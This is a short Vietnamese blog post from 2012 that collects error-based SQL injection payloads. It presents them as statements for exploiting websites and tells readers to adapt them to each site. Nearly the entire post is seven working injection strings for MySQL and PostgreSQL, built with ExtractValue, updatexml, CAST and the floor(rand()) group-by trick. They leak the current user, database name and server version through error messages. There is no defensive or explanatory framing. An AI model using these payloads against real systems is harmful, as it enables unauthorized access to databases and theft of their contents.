Trang chủ
»
SQL Injection
» Tổng hợp 1 số câu lệnh khai thác SQLI error base
11 thg 7, 2012
Tổng hợp 1 số câu lệnh khai thác SQLI error base
Mỗi site sẽ có cách khai thác khác nhau.Tuỳ cơ ứng biến nhé===========================================================
+and 1=CAST(current_user||CHR(58)||current_database()|| CHR(58)||version()||CHR(58)||123 as int)
===========================================================
' and '1'=(select 1 AND ExtractValue(1,concat(0x5C,(user())))) and '1'='1
===========================================================
and updatexml(0,concat(0x3a,version()),0)-- -
===========================================================
null and extractvalue(rand(),concat(0x3a,version(),0x3a,use r()))--
===========================================================
(@:=1)||@ group by concat(version(),0x7c,database(),0x7c,user(),!@) having@||min(@:=0)
===========================================================
/*!And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select concat_ws(0x7c,version(),database(),user())),floor (rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)*/--
===========================================================
+or+1+group+by+concat(0x7c,version(),floor(rand(0) *2))+having+min(0)+or+1--+
==========================THE END=================================
Không có nhận xét nào:
Đăng nhận xét